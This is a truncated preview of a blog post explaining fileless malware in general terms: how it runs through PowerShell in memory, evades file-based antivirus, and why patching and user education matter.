Member-only story
Fileless Malware: The Advent of New Generation Malware — Some Dude Says
I previously wrote about another technique malware and ransomware authors were using to obfuscate their infections. Fileless malware is the natural evolution of this and is far scarier for file-based antivirus solutions. These infections have been making the news with Sodinokibi (or Revil), and others.
These malware attacks are coming from more recent exploits which allow them to run what they want in memory without having to touch the disk at all (for the infection itself) as long as Powershell works on the machine. These attacks hit suddenly and efficiently, and are missed by most current traditional antivirus solutions. The combination of zero-day exploits and majorly obfuscated launch methods make preventing these require vigilance in every aspect of security from patching to user education.
What Is Fileless Malware?
Fileless malware is malware which does not exist in a file on the disk itself. This is not to say a file cannot be involved (as typically you see a batch file or other script kick off the process), but that the actual payload piece is not found in a file. These work by having a downloader which is completely impossible to identify as anything more than just a simple downloader. This downloader drops a bit of Powershell which then…
